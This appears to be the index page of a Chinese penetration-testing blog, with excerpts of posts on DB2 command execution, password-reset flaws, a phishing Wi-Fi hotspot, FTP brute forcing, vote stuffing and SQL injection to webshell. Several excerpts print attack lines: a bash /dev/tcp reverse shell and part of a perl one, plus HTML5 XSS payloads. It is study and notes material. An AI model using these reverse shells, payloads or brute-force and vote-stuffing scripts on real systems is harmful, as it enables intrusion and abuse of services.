202007-23 日常渗透测试搞站记录 DB2 数据库权限执行系统命令 记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口: 1、创建一个临时的表 CREATE TABLE 数据库名.表名 ( test VARCHAR (500) ) ; 2、创建存储过程(windows) CREATE PROC.... Read More >
201908-03 各cms安装处任意文件读取(MySQL connect file read) 周末在公司打酱油,看到监控的某个漏洞平台上出现了很多个新的漏洞,漏洞标题都是 xx cms 安装处任意文件读取。 不明所以,加了漏洞提交者的微信,看看了提交者在某大会的演讲ppt,在微信群问了温,Goolge了一下,看到几篇文章,很涨姿势,贴上各文章的URL,记录一下以后可能会用到。 https://xz.aliyun.com/t/3973 http://russiansecur.... Read More >
201907-31 Powershell脚本MailSniper报错”无法将xxx项识别为cmdlet、函数” 解决powershell脚本运行的报错,系统环境是windows 10 C:\Users\Administrator>powershell.exe -exec bypass Windows PowerShell 版权所有 (C) Microsoft Corporation。保留所有权利。 PS C:\Users\Administrator> d: PS D:\> cd .... Read More >
201711-01 任意用户密码重置的10种姿势 以前安全测试最爱挖的就是任意用户密码重置,今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势: 1,短信验证码可爆破; 视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验.... Read More >
201705-05 wordpress 4.6远程代码执行漏洞环境搭建 这篇文章主要是记录下搭建漏洞测试环境的过程,然而从中午开始,断断续续的一直折腾到凌晨,只是搭建了成功了本地能复现的环境,并没有实现远程复现。 究其原因,主要是固执到一直想用daocloud来搭建测试环境,坑好多,花了太多时间来填坑了,记录下过程。 docker pull wordpress:.... Read More >
201703-09 如何最大化的将漏洞扼杀在摇篮里 安全攻城狮在公司存在之初,刚开始更多进行的是救火的工作,救火工作并不能从根源上解决漏洞的产生。 如何最大化的将漏洞扼杀在产生之初,这个实际上某个dalao提的问题,问了几位老司机,做一下小笔记。 1,定期化的安全培训,需要注重培训效果、培训次数、培训覆盖面、帮助文档、培训反馈; 2,系统设计阶段,就需要安全测试小伙伴的介入,了解开发过程、熟悉业务流程,只有掌握足够多的信息,才能发.... Read More >
201703-07 [紧急预警]Struts2 基于Jakarta的远程命令执行漏洞 安恒给官方上报的,然后官方选择了1个对国内来说比较敏感的时期发了公告出来,好蛋疼。 该漏洞的CVE编号是CVE-2017-5638(s2-045),攻击者利用该漏洞可以进行远程命令执行,从而获取更高的服务器权限。 查了点资料,发现跟struts2配置中常量的配置有关,以struts-2..... Read More >
201509-05 解决:Failed to open Jython JAR file BurpSuite安装插件SQLipy的时候遇到如下的错误: java.lang.Exception: Failed to open Jython JAR file at burp.p9b.<init>(Unknown Source) at burp.hec.a(Unknown.... Read More >
201507-25 Kali linux创建钓鱼wifi热点 最近做了一个小的安全意识培训,目的是让小伙伴们谨防不信任的Wifi热点,用到了kali linux下的一些小工具。我是用物理机安装的kali linux,然后外接了一个无线网卡wlan2。 具体的技术细节记录一下,具体的shell脚本如下: #! /bin/bash case $1 in “start”) sleep 1 ifconfig wla.... Read More >
201311-19 FTP帐号密码暴力破解小工具(新手学python) 群内一童鞋写的ftp暴力破解小工具,主要用到了FTP模块,功能很简单,不大实用,还有很多需要改进的地方,贴上代码: from ftplib import FTP import time def ConnectFtp(ftpAddress,user,password): for myaddress in ftpAddress: f=FTP(myaddress) .... Read More >
201311-07 python自动投票(新手学python) 前段时间看到黑马发起的2013年度创业家评选的网络投票活动,发现没有对单IP投票次数进行限制,可以无限次的投! 公司的大BOSS居然也在候选名单中,准备给大BOSS刷点票,写了个python自动投票脚本!主要用了httplib模块自动提交post请求. 贴上代码: #!/usr/bin/env python #coding=utf8 import httplib, urlli.... Read More >
201310-21 反弹shell的十种姿势 转载自 Wooyun Zone 作者:XSSER bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >
201307-10 HTML5下的XSS测试代码 国外某童鞋收集整理的针对HTML5的 XSS测试代码 <video> <source onerror=”javascript:alert(1)”> 引入媒体类测试代码Example: <video onerror=”javascript:alert(1)”>.... Read More >
201304-25 共享的主机服务器风险简单分析 这篇文章的目标受众是服务器管理员,网站管理员,安全爱好者和专业信息安全人员等,主要简单分析了一个主机服务器存在的一些风险。 让我们来看看在一个共享的托管服务器上,你的网站不是那么安全的一些原因: 1,如果服务器上有任何一个网站被攻破,其它的网站可能也会面临被攻破的可能; 2,恶意攻击用户可以从主机提供商购买虚拟主机,然后达到入侵其它同服务器网站的目的; 3,虚拟主机没有足够.... Read More >
201304-18 DVWA之从SQL注入到写入webshell 这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是用DVWA(渗透测试演练系统).对于SQL注入利用,有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助,进一步进行注入,获取帐号密码等敏感信息; 3,上传web.... Read More >
201303-25 w3af、N-stalker等Web渗透测试工具使用介绍 本人将介绍几款比较不错的Web渗透测试工具,Powerfuzzer、N-Stalker和w3af.通过本人你将学会这几款工具的简单使用,以及xss、sqli等常见漏洞的利用等,适合新手朋友。 Powerfuzzer 官方网站:http://www.powerfuzzer.com Pow.... Read More >